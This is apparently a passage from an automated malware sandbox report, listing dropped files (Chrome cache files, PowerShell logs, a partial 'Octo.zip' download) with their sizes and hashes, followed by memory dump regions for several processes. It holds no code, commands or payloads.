7f937b39db644aa5b7a43e4cc9c09b6f3f1e7af5db15a7a79ec7399a5ce3e158

SHA512
b8c54ef20d75c44cc0f4def5c08bc01b5d7101ac7040753fff1434a14215aab875bc782ea1f364cc8bc7dad5c535778dee155ab1b47b7d318b2580b546794c48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
99KB

MD5
733e75042af9db63819f6f8e20db0c8f

SHA1
7e5df6e25ebae1bad526eea53603f90e81355dc8

SHA256
4e0450f0ed58450a0e9d5608f1774fc5a6b03ce44157260f554053d03ed5ebd2

SHA512
e87872a5d2150b57a70f8f6be356c5b5c9e2bd6d67669c55735a47aea8d24f4f3be8a2d989d2591deefc587c6478df5a0cab82e0937fc79e90f19fb585136138

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
7fb544b00e82c8b4d60791c2b7392fc0

SHA1
a391051d404bc1503fd6c0b74964bb3dc0f39345

SHA256
befc67b4658ce29863217e49b66b422667e13c40ba1f5d816e99cd295d0becf6

SHA512
b6e6d34723e579ad3ebc25efdea45abd1b235fabff6cb440452078851d0f774a84888fa7c9718d10cbf420ddf37a1042d68e83732104886228af3a7ce9b72f5d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe592b4c.TMP

Filesize
93KB

MD5
c47f0a13c82ff29701b5171a9c1a6544

SHA1
b8bc6d7a5d3e80f17fd9085c6f208ea565656b16

SHA256
5e8099c99528eb487c18a1feb7a52a94c9be2d6a16ce7da36377d867038e99eb

SHA512
db75a69828f705ebdfbffd36d85a1b86ae726d66d7e9c772238a41bfcb00868e81107560d9b993fda9ca185a7f4823b1440c782cce8d4beaf37b5cf1f867a6ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\b8bb11c3-f10e-46ab-b85f-50991eb75442.tmp

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ee317023361c70de122f439b9d3bbf39

SHA1
c93675cc2cb8ca9b001989829ea03b3afe10e237

SHA256
1179e46df1ca4985aa27033e035440cefa779cc977657281d63541aeaa8cccab

SHA512
ee9ea5c6f5a58b1f99eb13028328ce6efdfcc362889b4a0a0670828a68a9d33c8cabaeca82202d5072efdb33abdb4c7061609cee67a504c9220194136191420a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
9cfc7a98b758174d91a40515a37ef935

SHA1
ccd0eff396f99a725c697990544c345256a36215

SHA256
8385a9299312f77a2ced3780086eeeb82f9aa7ab0080d6a26235e09f066ec26e

SHA512
0a11eb0d96f5669c2e2bed54bbca25395b9d1749384e452fd2e97ca4457d8d04f58d764839fcba56eb5e081844d11f455a9d1342a086c21318300ebe93987001

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
14KB

MD5
b74b59ebaaf1c870604c9be24ea3d4cb

SHA1
4293d84f904bbc49254b9a3e620b854d64214359

SHA256
eb3ab8ef81d78abec557159220c6e7445b1bdab1369de553fef1990f78d276d8

SHA512
4b16b232b3bc5e01feda60e600ab580abcd5676628ec9cfddffd3b224b8c2c68843df7b13faaf035f85135174a5bdf6872c7490e55a661008f340e54d1c65c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0b6b61940be5c3a5c111f335fd638bd

SHA1
12707b630a6137216be00a4ff525ac6d1ce041fc

SHA256
0d032c0438f42ae012d9ab5a3a6c1497992a82be8741771053520091ab344e59

SHA512
5c7ec63a0d6a474b3fd0a9642ae3f3d0d5c40eca49e8ffa503df6ce6aa1966bf95bf5ddd4b7c60f5079ead611c679a8860e0f7ba5d6f1e565fc27800757f72d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d35abade8ffb9c6a1e06bd2e0c62119c

SHA1
125b4521b7f4e8a506ad1de87d6621421652d5f1

SHA256
acad9aeb4fa100919de705f3af100cb73eaa3465ce0efd99e24d44f2530bb76c

SHA512
e65b3e01afa86e2260b214a1ace752f6bd6ae09fad27080568e8c86a30b4bb3ce536d669ea8ec2fc74f3111140f80e77bf06978737302d6cb8a2f5c32f36aa64

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_umlfzr5a.xlc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\Octo.zip.crdownload

Filesize
12.4MB

MD5
01b7de13b8bc8a313c4b40edac99e112

SHA1
8b359edfb542fe83fb310db5f31b188b4a8b08e1

SHA256
1f1a0d5697c39d7a8efd7db67ed1b09f11c5ee5fdad70d2c2127464cdbfbc89f

SHA512
dfcfff519490800ee8c6396d1270c9f0e8a806389f2982986a350a7c6c3c7ec93d4e34930a0b6f32daa25efd70e38e22484ff7e19231aade90a7c7094ad590f8

Download Submit
memory/1272-1194-0x000002055DF50000-0x000002055DF60000-memory.dmp

Filesize
64KB

Download
memory/1272-1226-0x000002055DF50000-0x000002055DF60000-memory.dmp

Filesize
64KB

Download
memory/1272-1229-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/1272-1170-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/1272-1173-0x000002055DF50000-0x000002055DF60000-memory.dmp

Filesize
64KB

Download
memory/1272-1172-0x000002055DF50000-0x000002055DF60000-memory.dmp

Filesize
64KB

Download
memory/2088-1162-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/2088-1149-0x0000014C81680000-0x0000014C81690000-memory.dmp

Filesize
64KB

Download
memory/2088-1096-0x0000014C81680000-0x0000014C81690000-memory.dmp

Filesize
64KB

Download
memory/2088-1054-0x0000014C81680000-0x0000014C81690000-memory.dmp

Filesize
64KB

Download
memory/2088-1055-0x0000014C81680000-0x0000014C81690000-memory.dmp

Filesize
64KB

Download
memory/2088-1050-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/2728-1495-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/2728-1374-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/2728-1376-0x0000000007550000-0x0000000007560000-memory.dmp

Filesize
64KB

Download
memory/2728-1375-0x0000000007550000-0x0000000007560000-memory.dmp

Filesize
64KB

Download
memory/2728-1483-0x0000000007550000-0x0000000007560000-memory.dmp

Filesize
64KB

Download
memory/2828-1268-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1499-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1267-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1543-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1516-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/2828-1514-0x000000000B030000-0x000000000B098000-memory.dmp

Filesize
416KB

Download
memory/2828-1513-0x000000000B010000-0x000000000B018000-memory.dmp

Filesize
32KB

Download
memory/2828-1510-0x000000000AFE0000-0x000000000AFFA000-memory.dmp

Filesize
104KB

Download
memory/2828-1497-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1266-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/2828-1498-0x0000000006E80000-0x0000000006E90000-memory.dmp

Filesize
64KB

Download
memory/2828-1492-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/3020-1168-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/3020-1100-0x0000027BB4170000-0x0000027BB4180000-memory.dmp

Filesize
64KB

Download
memory/3020-1064-0x0000027BB4170000-0x0000027BB4180000-memory.dmp

Filesize
64KB

Download
memory/3020-1161-0x0000027BB4170000-0x0000027BB4180000-memory.dmp

Filesize
64KB

Download
memory/3020-1063-0x0000027BB4170000-0x0000027BB4180000-memory.dmp

Filesize
64KB

Download
memory/3020-1058-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/4288-1248-0x0000000008760000-0x00000000087AB000-memory.dmp

Filesize
300KB

Download
memory/4288-1515-0x000000000B160000-0x000000000B1B6000-memory.dmp

Filesize
344KB

Download
memory/4288-1287-0x0000000009210000-0x000000000924C000-memory.dmp

Filesize
240KB

Download
memory/4288-1238-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4288-1542-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4288-1243-0x00000000074A0000-0x00000000074C2000-memory.dmp

Filesize
136KB

Download
memory/4288-1380-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4288-1509-0x000000000B700000-0x000000000BD78000-memory.dmp

Filesize
6.5MB

Download
memory/4288-1338-0x0000000009310000-0x0000000009386000-memory.dmp

Filesize
472KB

Download
memory/4288-1244-0x0000000007BC0000-0x0000000007C26000-memory.dmp

Filesize
408KB

Download
memory/4288-1239-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/4288-1241-0x0000000007520000-0x0000000007B48000-memory.dmp

Filesize
6.2MB

Download
memory/4288-1491-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/4288-1247-0x0000000008240000-0x000000000825C000-memory.dmp

Filesize
112KB

Download
memory/4288-1500-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/4288-1240-0x0000000004A30000-0x0000000004A66000-memory.dmp

Filesize
216KB

Download
memory/4288-1246-0x0000000007ED0000-0x0000000008220000-memory.dmp

Filesize
3.3MB

Download
memory/4288-1245-0x0000000007E60000-0x0000000007EC6000-memory.dmp

Filesize
408KB

Download
memory/4560-1496-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4560-1484-0x0000000005360000-0x0000000005370000-memory.dmp

Filesize
64KB

Download
memory/4560-1381-0x0000000005360000-0x0000000005370000-memory.dmp

Filesize
64KB

Download
memory/4560-1379-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4856-1018-0x000001EAF1100000-0x000001EAF1110000-memory.dmp

Filesize
64KB

Download
memory/4856-1002-0x000001EAF1100000-0x000001EAF1110000-memory.dmp

Filesize
64KB

Download
memory/4856-1001-0x000001EAF1100000-0x000001EAF1110000-memory.dmp

Filesize
64KB

Download
memory/4856-1005-0x000001EAF1290000-0x000001EAF1306000-memory.dmp

Filesize
472KB

Download
memory/4856-1042-0x000001EAF1100000-0x000001EAF1110000-memory.dmp

Filesize
64KB

Download
memory/4856-1051-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-1000-0x00007FFE93280000-0x00007FFE93C6C000-memory.dmp

Filesize
9.9MB

Download
memory/4856-999-0x000001EAF0F20000-0x000001EAF0F42000-memory.dmp

Filesize
136KB

Download